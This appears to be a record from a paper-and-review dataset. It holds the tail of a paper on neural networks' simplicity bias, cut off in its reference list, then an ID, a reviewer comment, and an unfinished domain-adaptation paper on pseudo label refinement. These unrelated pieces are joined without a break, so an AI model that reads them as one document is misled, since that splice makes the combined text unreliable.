We generate 100,000 samples from each of these three generative distributions and perform a one-tailed t-test on the null hypothesis that \( \mu(K(S_{\text{GPT}})) \geq \mu(K(S_{\text{U}})) \), where \( S_{\text{GPT}} \) and \( S_{\text{U}} \) respectively denote random sequences generated by the language model or a uniform distribution. Performing this hypothesis test, we reject the null hypothesis for both randomly initialized and pre-trained models with an extremely low p-value, indicating that language models are indeed more likely to generate simple sequences. Details are found in Appendix G. We conclude that neural networks for language generation, both trained and randomly initialized, express a bias towards low Kolmogorov complexity which mirrors that of data, as demonstrated in Section 3, and which was previously observed for classifiers in Valle-Perez et al. (2018). Language models, both pre-trained and randomly initialized, prefer to generate low-complexity sequences. As a result, we can use even such randomly initialized models to predict the next element in a sequence, as long as the sequence is low-complexity. 5 MODEL SELECTION WITH A SIMPLICITY BIAS In typical industrial workflows, practitioners examine their data and select an appropriate learner. We can then consider the human model selector and the model they select as a single meta-learner. Whereas the no free lunch theorems seemingly preclude automated meta-learners which select performant models on any task, empirical works show that model selection can in fact be automated in practice (Vilalta & Drissi, 2002). Giraud-Carrier & Provost (2005) show that, with minimal assumptions, the defeating conclusion of Wolpert's no free lunch theorem is escaped as long as datasets share structure so that the model selector generalizes to new datasets. In this section, we argue why, in principle, model selection can be automated from the view of Kolmogorov complexity. 5.1 MODEL SELECTION AND GENERALIZATION BOUNDS When developing a machine learning approach for an application, it is often helpful to leverage domain knowledge in constructing or choosing the right model for the task. One might start by choosing from families like MLPs, CNNs, GNNs, PointNets, or Transformers and then decide on the appropriate way of featurizing inputs, possibly incorporating knowledge of data symmetries via hard-coded equivariances or data augmentations. Even if we are extremely generous and suppose the practitioner is choosing from 100 million models, we can consider the impractical algorithm of selecting one via cross validation. While one might expect that such a procedure would overfit, even finite hypothesis bounds show that it does not. Using cross validation on a validation set of size 20000 for a classification problem, plugging a uniform prior $P(h) = 1/|\mathcal{H}| = 10^{-8}$ into the finite hypothesis bound (Equation 3), we get that the gap between validation and test error will be less than 3.4% with probability greater than 99%. Ultimately, we avoid overfitting because we only need a number of data points proportional to the log of the size of the hypothesis space. This reasoning can also be applied to theoretically resolve the empirical observation in Recht et al. (2019) that we are not overfitting the test sets of popular benchmarks (more discussion in Appendix I).
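The arithmetic behind this claim is easy to spell out. The sketch below evaluates the finite hypothesis bound with natural logarithms; whether the denominator carries the factor of 2 depends on the exact concentration inequality used, which moves the gap between roughly 2.4% and 3.4%, both consistent with the figure quoted above.

```python
import math

# Sanity-checking the model selection argument above (our own arithmetic;
# the bound form follows the finite hypothesis bound of Section 4.1).
num_models = 1e8    # |H|: 100 million candidate models
n_val = 20_000      # validation set size
delta = 0.01        # failure probability of 1%

log_terms = math.log(num_models) + math.log(1 / delta)
print(math.sqrt(log_terms / (2 * n_val)))  # ~0.024 with the 2n denominator
print(math.sqrt(log_terms / n_val))        # ~0.034 with an n denominator
```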
For an even more general class of models, one may consider the number of bits needed to specify model architectures like MLPs, CNNs, or GNNs, as well as symmetries and any other required information. In each case, the architecture can be expressed in few bits. A near state-of-the-art computer vision model can be expressed in only 280 characters (Trockman & Kolter, 2022) in PyTorch. Similarly, important symmetries like translations, rotations, reflections, and other matrix groups can be expressed in few lines of code (Finzi et al., 2021b) and can be used to encode equivariances or for augmentation. Therefore, even in selecting from all possible models that can be expressed in that short amount of code, we can expect to generalize with only tens of thousands of data points. In principle, automating model selection directly via cross validation provably generalizes well across millions of models with only thousands of data points. 5.2 ONE MODEL FOR BIG AND SMALL TRAINING SETS It is commonly believed that small training datasets demand compact architectures, whereas large training sets can accommodate flexible ones. Accordingly, practitioners hand select appropriate models for their datasets. We now show how we can intervene on the principle of combining flexibility with a simplicity bias, explored throughout the paper, to argue that a single learner can be effective for all data sizes. Our prior should prefer simple functions we believe are more likely yet support a wide variety of functions. We begin with a simple illustration on polynomial regression. **Polynomial regression.** Common intuition dictates that high degree polynomials overfit small training sets. In contrast, low degree polynomials cannot fit complicated functions so they should be avoided when training data is plentiful. However, we find that a single high degree polynomial can be effective across a wide variety of sample sizes as long as we encode a preference for low-complexity solutions, which rely on low degree coefficients. To this end, we adopt Tikhonov regularization with Tikhonov matrix $\text{diag}((\alpha k^2)_{k=0}^{d})$; in particular, we impose an $\ell_2$ penalty that increases quadratically with the degree of the corresponding monomial. In Appendix H, we see that this model, which is flexible yet has a strong simplicity bias, performs at least on par with a low degree polynomial when training data is scarce, and with a high degree polynomial when training data is abundant. **Neural networks.** We illustrate a similar concept with neural networks. We consider a small network, GoogLeNet (Szegedy et al., 2015), which performs well on small datasets such as CIFAR-10 and CIFAR-100 (Krizhevsky, 2009), but poorly on larger datasets like ImageNet (Deng et al., 2009). We also consider a large network, ViT-B/16 (Dosovitskiy et al., 2020), which performs significantly worse on CIFAR variants but better on ImageNet. As in the polynomial example, we can combine these two architectures, specifying our preference for GoogLeNet to the extent that it fits the training data. We train both models and then take a convex combination of their logits, $c \cdot \text{logits}_{\text{ViT}} + (1 - c) \cdot \text{logits}_{\text{G}}$, controlled by a parameter $c$ with $\ell_2$ regularization in favor of GoogLeNet (i.e., by adding $\lambda c^2$ to the loss function). In Figure 3, we observe that while GoogLeNet and ViT each have strengths and weaknesses, combining them with a preference for simplicity achieves the best of both worlds. 
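A minimal sketch of this convex combination is given below; the random logits stand in for trained GoogLeNet and ViT outputs, and the penalty strength `lam` and optimizer settings are assumptions of ours.

```python
import torch

torch.manual_seed(0)
logits_vit = torch.randn(256, 10)    # placeholder for trained ViT-B/16 logits
logits_goog = torch.randn(256, 10)   # placeholder for trained GoogLeNet logits
labels = torch.randint(0, 10, (256,))

c = torch.tensor(0.0, requires_grad=True)  # c = 0 starts fully at GoogLeNet
opt = torch.optim.Adam([c], lr=0.1)
lam = 0.1                                  # assumed l2 pull toward GoogLeNet

for _ in range(100):
    mixed = c * logits_vit + (1 - c) * logits_goog
    loss = torch.nn.functional.cross_entropy(mixed, labels) + lam * c ** 2
    opt.zero_grad(); loss.backward(); opt.step()

print(float(c))  # learned mixing weight; grows when the ViT logits fit better
```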
While aggressively restricting our architectures can decrease computational cost, it is unnecessary for generalization. In other words, GoogLeNet and ViT can be combined into a single learner with greater flexibility than GoogLeNet and a stronger simplicity bias than ViT, so that manual selection between them is not required across data sizes. In summary, flexible models with a low-complexity bias can be a one-stop shop for machine learning, since real-world data favors low complexity. We do not need to compromise on flexibility in order to express a preference for low-complexity solutions. Instead, follow Occam's razor and choose the simplest explanation for the training set. We provide experimental details and additional experiments with Swin Transformer (Liu et al., 2021) in Appendix H. A single model can work well with both small and large training sets, so long as we embrace flexibility combined with a soft simplicity bias. ### 6 DISCUSSION While large ML models are highly flexible, we saw that they reliably prefer low Kolmogorov complexity solutions—aligning well with relevant learning problems—despite not being designed with complexity in mind. This observation raises the question: why exactly do neural networks encode such a strong preference for low complexity, and how can we tune this preference? Complementing the above observation, we also saw that a single expressive model which simultaneously supports a diversity of solutions but prefers simple ones can solve both simple and hard problems across sample sizes. Such learners present clear advantages over the current paradigm in deep learning, in which we manually select small constrained architectures or large ones with mild inductive biases, depending on the problem. Keeping this possibility in mind, can we design expressive yet simplicity-biased models with affordable computational costs? We include an extended discussion of several fundamental themes that surface throughout the paper in Appendix I. REFERENCES Pierre Alquier. User-friendly introduction to PAC-Bayes bounds. *arXiv preprint arXiv:2110.11216*, 2021. Idan Amir, Tomer Koren, and Roi Livni. SGD generalizes better than GD (and regularization doesn't help). In *Conference on Learning Theory*, pp. 63–92. PMLR, 2021. Sanjeev Arora, Rong Ge, Behnam Neyshabur, and Yi Zhang. Stronger generalization bounds for deep nets via a compression approach. In *International Conference on Machine Learning*, pp. 254–263. PMLR, 2018. Gregory Benton, Wesley J Maddox, Jayson Salkey, Julio Albinati, and Andrew Gordon Wilson. Function-space distributions over kernels. *Advances in Neural Information Processing Systems*, 32, 2019. David M Blei, Andrew Y Ng, and Michael I Jordan. Latent Dirichlet allocation. *Journal of Machine Learning Research*, 3(Jan):993–1022, 2003. Léonard Blier and Yann Ollivier. The description length of deep learning models. *Advances in Neural Information Processing Systems*, 31, 2018. Lorenzo Brigato and Luca Iocchi. A close look at deep learning with small data. In *2020 25th International Conference on Pattern Recognition (ICPR)*, pp. 2490–2497. IEEE, 2021. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in Neural Information Processing Systems*, 33:1877–1901, 2020. Gregory J Chaitin. Information-theoretic limitations of formal systems. *Journal of the ACM (JACM)*, 21(3):403–424, 1974.
Ping-yeh Chiang, Renkun Ni, David Yu Miller, Arpit Bansal, Jonas Geiping, Micah Goldblum, and Tom Goldstein. Loss landscapes are all you need: Neural network generalization can be explained without the implicit bias of gradient descent. In *The Eleventh International Conference on Learning Representations*, 2023. Biagio Ciuffo and Vincenzo Punzo. "No free lunch" theorems applied to the calibration of traffic simulation models. *IEEE Transactions on Intelligent Transportation Systems*, 15(2):553–562, 2013. Navneet Dalal and Bill Triggs. Histograms of oriented gradients for human detection. In *2005 IEEE Computer Society Conference on Computer Vision and Pattern Recognition (CVPR'05)*, volume 1, pp. 886–893. IEEE, 2005. Stéphane d'Ascoli, Pierre-Alexandre Kamienny, Guillaume Lample, and François Charton. Deep symbolic regression for recurrent sequences. *arXiv preprint arXiv:2201.04600*, 2022. Giacomo De Palma, Bobak Kiani, and Seth Lloyd. Random deep neural networks are biased towards simple functions. *Advances in Neural Information Processing Systems*, 32, 2019. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. ImageNet: A large-scale hierarchical image database. In *2009 IEEE Conference on Computer Vision and Pattern Recognition*, pp. 248–255. IEEE, 2009. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. In *International Conference on Learning Representations*, 2020. Gintare Karolina Dziugaite and Daniel M Roy. Computing nonvacuous generalization bounds for deep (stochastic) neural networks with many more parameters than training data. *arXiv preprint arXiv:1703.11008*, 2017.
JGTC6WgO4T
Furthermore, when the cardinality of 'Ic' is 'M', there is another possible scenario where all source models have identical predictions. The paper does not explicitly mention this, which is a lack of rigor.
LABEL SPACE-INDUCED PSEUDO LABEL REFINEMENT FOR MULTI-SOURCE BLACK-BOX DOMAIN ADAPTATION Anonymous authors Paper under double-blind review ABSTRACT Unsupervised Domain Adaptation (UDA) aims to train a model for an unlabeled target domain by transferring knowledge from a source domain. However, standard UDA requires access to source data and models, which hinders its practical application due to privacy and security concerns. Black-Box DA (BDA) relaxes these constraints by defining a pseudo label from a single source prediction, which allows for self-training of the target model. Nonetheless, existing methods give limited consideration to multi-source settings, in which multiple source domains are available to generate pseudo labels. In this work, we introduce a novel training framework for multi-source BDA (MSBDA), dubbed Label Space-Induced Pseudo Label Refinement (LPR). Specifically, LPR incorporates a Pseudo label Refinery Network (PRN) that learns, from the source predictions, the relations among sources conditioned on the target. The target model is adapted by self-learning using a pseudo label generated by PRN. We provide theoretical support for the performance of LPR. Experimental results on four benchmark datasets demonstrate that MSBDA using LPR achieves highly competitive performance compared to state-of-the-art approaches under different DA settings. 1 INTRODUCTION Unsupervised domain adaptation (UDA) is used to transfer domain knowledge acquired from a labeled source domain to an unlabeled target domain. The primary goal of UDA is to mitigate the impact of distribution shifts between the source and target domains, while reducing the labeling burden in the target domain (Saito et al., 2018; Long et al., 2015; Sun & Saenko, 2016; Long et al., 2017). However, existing UDA methods still demand labeled source data (Ganin et al., 2016; Long et al., 2015) or the parameters of a source model (Qu et al., 2021; Liang et al., 2020) to train a target model. These requirements impede the deployment of a target model in real-world applications, and they also raise concerns about privacy and security (Dong et al., 2020; Jaradat, 2017). Black-box DA (BDA) (Zhang et al., 2021; Liang et al., 2022; Liu et al., 2022b; Yang et al., 2022) has been proposed so that a target model can adapt using only the predictions of a source model in an unlabeled target domain. No other knowledge from the source domain is utilized. Given these limited resources, a straightforward BDA approach is to generate pseudo labels from a source model and directly use them for adaptation. The primary concern is the quality of the pseudo labels. Liu et al. (2022b) created a pseudo label through a weighted sum of the source and target predictions, in which the weight parameters changed with the confidence of the target prediction. Liang et al. (2022) tried to reduce noise in source predictions using adaptive label smoothing. Previous BDA methods have used a single source model, assuming that the distributions of the source and target domains are sufficiently correlated. It is natural and necessary to consider multiple source domains in BDA (MSBDA), because a user can select one or more source APIs. However, the correlation of source domains is usually unknown for the target adaptation, which makes this setting more realistic but also more challenging than single-source BDA. There are only a few MSBDA studies (Liang et al., 2022). Liang et al. calculated the average of the individual source predictions to extend their original BDA method to an MSBDA method.
However, they ignored the differing importance of the source models. In this paper, we propose a novel self-supervised pseudo-labeling framework for MSBDA to effectively train a target model. While existing BDA methods have neglected the varied characteristics of different sources, the proposed method focuses on exploring statistical relations among the source domains and extracting useful information from them. According to our theoretical analysis, a risk factor of a source prediction, which expresses how far the target error of a hypothesis deviates from the oracle error, can determine a positive or negative impact on the efficacy of pseudo label generation. Based on this, we propose a pseudo-label refinery network (PRN) with a division of the label space to produce confident source predictions that facilitate positive knowledge transfer. The optimization focuses on the concentration of source predictions within a label space and closeness across label spaces, as presented in Figure 1, motivated by our theoretical analysis. In contrast, assigning an equal contribution to every prediction would be sub-optimal, because some predictions may have negative impacts. The main contributions of this work are as follows: • We develop a novel MSBDA framework that leverages only the predictions of source models to explore positive knowledge from multiple source domains. To the best of our knowledge, this work is the first to explore positive knowledge from multiple source domains, which is a challenging yet significant task in the field of MSBDA. • We present a theoretical analysis to demonstrate the effectiveness of the proposed training strategy and propose the PRN architecture, specifically designed to resolve complex relations in source and target domains and refine a pseudo label. • We evaluate the proposed method on four benchmark datasets and demonstrate that it outperforms state-of-the-art methods in various domain adaptation settings. 2 RELATED WORKS UDA. Conventional UDA aims to adapt a target model to an unlabeled target domain by leveraging the knowledge learned from a labeled source domain. Several studies (Long et al., 2015; Sun & Saenko, 2016; Long et al., 2017; Yan et al., 2017; Saito et al., 2018; Lee et al., 2019) have attempted to minimize the statistical discrepancy between source and target domains. Meanwhile, adversarial learning-based UDA methods have been presented to align source and target domains at the feature level (Tzeng et al., 2017; Long et al., 2018), pixel level (Bousmalis et al., 2017; Sankaranarayanan et al., 2018; Xu et al., 2020b), and category level (Saito et al., 2018; Xie et al., 2018; Pan et al., 2019; Xu et al., 2020a). These methods demand access to source data or the parameters of a source model. Multi-source domain adaptation (MSDA). MSDA is an extension of standard DA for when it is unclear which source domains are best suited for a target adaptation. In (Mansour et al., 2008), the distribution of a target domain was approximated through a mixture of those of the source domains. (Hoffman et al., 2018a; Zhao et al., 2018; Li et al., 2018) derived theoretical cross-domain bounds to model the discrepancy among multiple source domains. (Zhao et al., 2018) proposed multiple domain adversarial networks (MDAN) to learn features invariant to various sources. (Xu et al., 2018) presented a deep cocktail network (DCTN) to address category shifts. Peng et al.
(2019) developed a dynamic method to align the moments of source and target feature distributions. **Source-free domain adaptation (SFDA).** SFDA further eliminates access to raw source data from the UDA setting and uses pseudo-labeling as an enabling method (Liang et al., 2020; Qiu et al., 2021; Ahmed et al., 2021). Qiu et al. (2021) used confidence re-weighting and regularization to reduce the negative transfer caused by noisy pseudo labels. Ahmed et al. (2021) introduced a solution for multi-source SFDA by combining the source models with suitable weights. Their model achieved performance comparable to the best choice of a single source model. **BDA.** There have been several studies (Zhang et al., 2021; Liang et al., 2022; Liu et al., 2022b; Yang et al., 2022) addressing the BDA problem. In Liang et al. (2022), adaptive label smoothing and structural knowledge distillation were proposed to approximate a target prediction to source predictions. In Liu et al. (2022b), a level of confidence was calculated for pseudo-labeling and target adaptation. Our work is substantially different from these previous studies in that it bridges BDA and the multi-source setting. **Pseudo-labeling.** It has been widely used in UDA to overcome the lack of labeled data in a target domain when the source data or model are not directly accessible. Self-training produces a pseudo label using a source prediction and uses it to fine-tune a target model. Liang et al. (2022) used pseudo-labeling in a black-box setting. Since these methods assumed single-source DA, they are not directly applicable to MSDA. Xu et al. (Xu et al., 2018) and Wang et al. (Wang et al., 2020) used hard pseudo-labeling to learn the interaction among domains. Different from these studies, we use a deep model that applies weighted distributions through self-attention to refine pseudo labels. ### 3 METHODOLOGY #### 3.1 Problem Formulation We address the adaptation of a $K$-way classification model in an MSBDA setting. There are $M$ labeled source domains $\mathcal{D}_S = \{\mathcal{D}_1, \mathcal{D}_2, \ldots, \mathcal{D}_M\}$ and one unlabeled target domain $\mathcal{D}_T$. $\mathcal{X}_i$ and $\mathcal{Y}_i$ refer to the set of input samples and their annotations from $\mathcal{D}_i$, respectively. We assume that the source domains and target domain share the same label space, i.e., $\mathcal{Y}_i = \mathcal{Y}_T$ for all $i$. In contrast, $x_i \in \mathcal{X}_i$ and $x_T \in \mathcal{X}_T$ follow different distributions. A source model $f_i \in f_S = \{f_1, f_2, \ldots, f_M\}$ has been trained using $\mathcal{D}_i$ and is used in the target domain. Then, $p_i = f_i(x_T) \in \mathcal{P}$ is the only means to generate a pseudo label $\hat{p}$ for the target adaptation. The previous methods (Xu et al., 2018; Wang et al., 2020) relied on a hard decision using $p_i$ to generate a pseudo label. The proposed method instead aims to reduce an upper bound of a risk, which estimates how far the target error of a hypothesis deviates from the oracle error, to produce an appropriate pseudo label. We explain the theoretical foundation and the proposed adaptation mechanism in the following sections. All the proofs of theorems are provided in the supplementary material. #### 3.2 Theoretical Analysis Denote by $y_T$ the ground-truth label of a target sample, which is unknown, and by $h \in \mathcal{H}$ a hypothesis of a target model.
Given a pseudo label $\hat{p}$, our goal is to find a theoretical upper bound on the difference between the target error $\epsilon(h, \hat{p}) = \mathbb{E}_{x \in \mathcal{X}_T}[\|h(x) - \hat{p}\|]$ and the oracle error $\epsilon(h, y_T) = \mathbb{E}_{x \in \mathcal{X}_T}[\|h(x) - y_T\|]$, because minimizing the bound can serve as a risk mitigation strategy to ensure that $\hat{p}$ is reliable for adaptation. For $\hat{p}$, a weighted linear combination of the individual source outputs has been a popular choice (Hoffman et al., 2018a; Zhao et al., 2018; Li et al., 2018). Following this assumption, we derive a general upper bound (Yang et al., 2022) for the MSBDA as in **Theorem 1**. **Theorem 1.** (General upper bound of a risk in target prediction) Denote $h$ as a hypothesis in $\mathcal{H}$. We then establish a theoretical upper bound on the difference between the target error and the oracle error as $$|\epsilon(h, \hat{p}) - \epsilon(h, y_T)| \leq \sum_i \alpha_i \epsilon(p_i, y_T),$$ (1) where the pseudo label is defined as $\hat{p} = \sum_i \alpha_i p_i$, $\alpha_i \geq 0$, $\sum_i \alpha_i = 1$. Existing BDA methods (Liang et al., 2022; Liu et al., 2022a;b) have attempted to decrease empirical errors, e.g., through de-noising of source predictions and label smoothing, when \( y_T \) is not accessible. Instead, in this framework, we modify the general bound using tractable terms without the ground truth to provide a practical solution. For this purpose, we first define a representative prediction, denoted as \( p_c \), which is assumed to be the one closest to the ground truth among the available source predictions. We then modify the theoretical upper bound by considering \( p_c \). **Lemma 1. (Modified upper bound of a risk)** \[ |\epsilon(h, \hat{p}) - \epsilon(h, y_T)| \leq \epsilon(p_c, y_T) + \eta, \quad (2) \] where \( p_c = \arg \min_{p_i \in P} \epsilon(p_i, y_T) \), and \( \eta = \sum_i \alpha_i \epsilon(p_c, p_i) \). In the bound derived in Lemma 1, \( \eta \) represents the degree of dispersion of the source predictions from the center \( p_c \) through the weighted error terms. \( \eta \) can be directly estimated from the accessible source predictions, and minimizing \( \eta \) reduces the upper bound of the risk associated with the reliability of a pseudo label, as in Eq.(2). However, there may be noisy outliers among the source predictions that hinder the optimization. When most of the \( p_i \) are dispersed from \( p_c \), \( p_c \) needs to move away from \( y_T \) to avoid the penalty, which leads to a sub-optimal solution. To avoid this failure, we consider a division of the label space and decompose the bound into tractable terms. Let us assume there exist \( P_c \) and \( P_d \subset P \) as two subsets of the entire label space. \( P_c \) and \( P_d \) are defined as the spaces in which the samples are concentrated around \( p_c \) and dispersed from \( p_c \), respectively. They are mathematically defined as follows: \[ P_c = \{ p_i \mid \epsilon(p_c, p_i) \leq \xi \}, \quad P_d = P \setminus P_c, \quad (3) \] where \( \xi \) denotes a threshold for the label space division. Then, we define the degree of dispersion of each label space as \[ \eta_c = \sum_{p_i \in P_c} \alpha_i \epsilon(p_c, p_i), \quad \eta_d = \sum_{p_i \in P_d} \alpha_i \epsilon(p_d, p_i), \quad (4) \] where \( p_d = \arg \min_{p_i \in P_d} \epsilon(p_c, p_i) \). **Theorem 2.
(Upper bound of a risk with a label space division)** \[ |\epsilon(h, \hat{p}) - \epsilon(h, y_T)| \leq \epsilon(p_c, y_T) + \eta_c + \eta_d + \sum_{p_i \in P_d} \alpha_i \epsilon(p_c, p_d), \quad (5) \] where \( p_d = \arg \min_{p_i \in P_d} \epsilon(p_c, p_i) \) is the representative prediction in \( P_d \). \( \eta_c = \sum_{p_i \in P_c} \alpha_i \epsilon(p_c, p_i) \) and \( \eta_d = \sum_{p_i \in P_d} \alpha_i \epsilon(p_d, p_i) \) are the dispersions of \( P_c \) and \( P_d \), respectively. As presented in Eq.(5), reducing both the dispersion within \( P_c \) and \( P_d \) and the distance between \( p_c \) and \( p_d \) lowers the upper bound. \( \epsilon(p_c, y_T) \) is an inherent error in MSBDA. In the following sections, we explain how to perform pseudo-labeling for a \( K \)-way classification task in a practical MSBDA setting, based on this theoretical analysis. ### 3.3 Label Space Division in \( K \)-Way Classification In the \( K \)-way classification, given \( x_T \), \( p_{ij} \) refers to the \( j \)-th element of the output probability vector from the \( i \)-th source model \( f_i(x_T) \in \mathbb{R}^K \) among \( M \) source domains. We define a set \( J = \{ j^*_i \} \) of indices \( j^*_i = \arg \max_j p_{ij} \) that maximize \( p_{ij} \) over \( j \), and a set \( I_c = \{ i_c \mid j^*_{i_c} = c \} \) of indices \( i_c \), where \( c = \arg \max_k \sum_i 1(j^*_i = k) \) is the majority predicted class. We define the set \( P_c \) to include \( p_{i_c j^*_c} \), in which \( i_c \in I_c \) and \( j^*_c = j^*_{i_c} \). The representative label \( p_c \in P_c \) is selected as \( \max p_{i_c j^*_c} \) over \( i_c \). In the degenerate case where all the source predictions are different, i.e., the cardinality of \( J \) is \( M \), we select the source prediction with the highest probability regardless of the categories. \( P_d \) and \( I_d \) are defined as \( P \setminus P_c \) and \( I \setminus I_c \), respectively. \( p_d \in P_d \) is chosen as \( \min p_{i_d j'} \) over \( i_d \), where \( j' \in J \setminus \{ j^*_c \} \) is the classification result of \( f_{i_d}(x_T) \). Figure 2: The proposed self-learning framework with a pseudo label refinement network (PRN), including a warm-up, a label refinement, and a target adaptation phase. PRN consists of attention (AT) and fully connected (FC) layers to consider the relevance between source and target domains and resolve their complex statistical relations. In the adaptation, the PRN is trained to improve the reliability of a pseudo label by encouraging concentration within label spaces and closeness across label spaces, based on the theoretical analysis. 3.4 Pseudo Label Refinery Network The proposed method utilizes a pseudo label refinery network (PRN) with a target model to generate high-quality pseudo labels, as shown in Figure 2. PRN is designed to learn the relations not only between different source domains but also between the source domains and the target domain. For this, it is implemented with stacks of refinement blocks that include an attention layer (AT) and a fully connected layer (FC) followed by a softmax (SM) layer, as presented in Figure 2. The AT is added to capture the level of attention, or relevance, of one source prediction to the other predictions. The FC generates refined predictions from the inputs. When $p_i (= f_i(x_T))$ is processed by the PRN to generate the final pseudo label, the result is not limited to a simple linear combination of source predictions with weights $\alpha_i$.
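A minimal sketch of the label space division rule of Section 3.3 is given below; the handling of count ties and the exact selection rule for $p_d$ follow our reading of the description above, and the example probabilities are hypothetical.

```python
import numpy as np

def divide_label_space(P: np.ndarray):
    """Split M source predictions (an M x K probability matrix) into the
    concentrated set P_c and dispersed set P_d of Section 3.3, returning
    their index sets and the representative predictions p_c and p_d."""
    preds = P.argmax(axis=1)                    # j*_i for each source model
    classes, counts = np.unique(preds, return_counts=True)
    c = classes[counts.argmax()]                # majority class (first on ties)
    I_c = np.where(preds == c)[0]
    I_d = np.where(preds != c)[0]
    p_c = P[I_c[P[I_c, c].argmax()]]            # most confident within P_c
    # Representative of P_d: the least confident prediction outside class c
    # (our reading of "min p_{i_d j'} over i_d").
    p_d = P[I_d[P[I_d, preds[I_d]].argmin()]] if len(I_d) else None
    return I_c, I_d, p_c, p_d

# Three sources, K = 4 classes: two agree on class 0, one prefers class 2.
P = np.array([[0.7, 0.1, 0.1, 0.1],
              [0.5, 0.2, 0.2, 0.1],
              [0.1, 0.2, 0.6, 0.1]])
I_c, I_d, p_c, p_d = divide_label_space(P)
print(I_c, I_d)   # [0 1] [2]
```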
The refinement-and-adaptation process using PRN consists of three phases: a warm-up phase, a label-refinement phase, and a target adaptation phase. We highlight that our genuine contribution in the PRN lies in the warm-up and label-refinement phases. Although we have made modifications to the target adaptation phase compared to previous studies, we maintained consistent training parameters to assess the performance gains achieved by our proposed method. 3.4.1 Warm-up Phase The output of the PRN is noisy with randomly initialized parameters in the early stage of adaptation. The warm-up phase is used to avoid failures due to such noisy samples and to produce initial predictions similar to the original source predictions. Denote $\mathcal{P}$ and $\mathcal{P}^w$ as the input concatenation of source predictions $[p_1 \ldots p_M]^T$ and the outcomes of the warm-up phase $[p_1^w \ldots p_M^w]^T$, i.e., $\mathcal{P}^w = \text{PRN}(\mathcal{P})$. The PRN in the warm-up phase is trained using a loss function defined as $$\mathcal{L}_w = \mathbb{E}_{x_T \in \mathcal{X}_T} \mathbb{E}_{i \in \mathcal{I}} KL(p_i \| p_i^w),$$ (6) where $KL$ is the Kullback–Leibler (KL) divergence, and $\mathcal{I}$ is a set of categorical indices. After the warm-up phase, $p_i^w$ is averaged over $i$ and used as an initial pseudo label to be refined later. 3.4.2 Label Refinement Phase The PRN refines the input predictions using both source and target predictions in this phase. It is necessary to exploit both predictions, because a target prediction can offer knowledge learned by the target model $f_T$ from an unlabeled target sample $x_T$. In what follows, the PRN takes the original source predictions $\mathcal{P}$ as the query and value and a target prediction $p_T (= f_T(x_T))$ as the key, conducts a cross-attention operation through the AT, and produces an output $\mathcal{P}_r$ as follows: $$\mathcal{P}_r = [p_1^r \ldots p_M^r]^T = \text{PRN}(\mathcal{P}, \mathcal{P}_T),$$ (7) where $\mathcal{P}_T = [p_T \ldots p_T]^T \in \mathbb{R}^{M \times K}$. The cross-attention calculates the level of attention of the target prediction to the source predictions in the label space and allows the PRN to be trained in an unsupervised manner while reflecting the relations between the source and target domains. The label space $\mathcal{P}_r$ is divided into $\mathcal{P}_c^r$ and $\mathcal{P}_d^r$ in the label refinement phase in Figure 2. The majority of the pseudo labels that output the same classification result are grouped into $\mathcal{P}_c^r$. The other pseudo labels are grouped into $\mathcal{P}_d^r$. We then define a training objective based on the analysis in Theorem 2. First, we define concentration losses to reduce the dispersion within $\mathcal{P}_c^r$ and $\mathcal{P}_d^r$ (see $\eta_c$ and $\eta_d$ in Eq.(5)), respectively, given as $$L_{cc} = \mathbb{E}_{x_T \in X_T} \mathbb{E}_{p_r \in \mathcal{P}_c^r} KL(p_c^r \| p_r),$$ (8) and $$L_{cd} = \mathbb{E}_{x_T \in X_T} \mathbb{E}_{p_r \in \mathcal{P}_d^r} KL(p_d^r \| p_r),$$ (9) where the representative labels $p_c^r \in \mathcal{P}_c^r$ and $p_d^r \in \mathcal{P}_d^r$ are chosen as explained in Section 3.3.
We employ a loss function that accounts for the distance between the two representative labels (see the last term in Eq.(5)), given as

$$L_{ld} = \mathbb{E}_{x_T \in X_T} \mathrm{KL}(p_c^r \| p_d^r).$$ (10)

Further, we employ a stabilization loss $L_s = \mathbb{E}_{x_T \in X_T} \mathbb{E}_{i \in I} \mathrm{KL}(p_i \| p_i^r)$ to keep each refined prediction close to the original $p_i$ and to avoid overfitting of the PRN to irrelevant probabilities. The PRN is trained using the total loss $L_r$ in the refinement phase, defined as

$$L_r = L_{cc} + \lambda_{cd} L_{cd} + \lambda_{ld} L_{ld} + \lambda_s L_s.$$ (11)

### 3.4.3 Target Adaptation Phase

In this phase, the target model is trained using the pseudo labels generated by the PRN. First, we average the refined predictions to obtain the final pseudo label, i.e., $\hat{p} = \frac{1}{M} \sum_{i=1}^{M} p_i^r$, and train the target model using $\hat{p}$ as the ground truth through a self-learning loss, $L_{sl} = \mathbb{E}_{x_T \in X_T} \mathrm{KL}(\hat{p} \| f_T(x_T))$. In addition, we utilize a mutual information loss to encourage the target model to maintain diversity among its predictions across all target instances. To this end, we adopt the widely used mutual information objective (Liang et al., 2020; 2022), $L_{im} = L_{ent} + L_{div} = \mathbb{E}_{x_T \in X_T} H(f_T(x_T)) - H(\hat{f}_T(x_T))$, where $H$ denotes an entropy function and $\hat{f}_T(x_T) = \mathbb{E}_{x_T \in X_T} f_T(x_T)$. Taken together, the final objective of the target model is $L_t = \lambda_t L_{sl} + L_{im}$, where $\lambda_t = \exp(-I/I_{target})$ decays exponentially with the training iteration $I$, and $I_{target}$ is the total number of target-adaptation iterations. During the target adaptation, the label refinement phase is performed at regular intervals.

## 4 Experiments

### 4.1 Experimental Setting

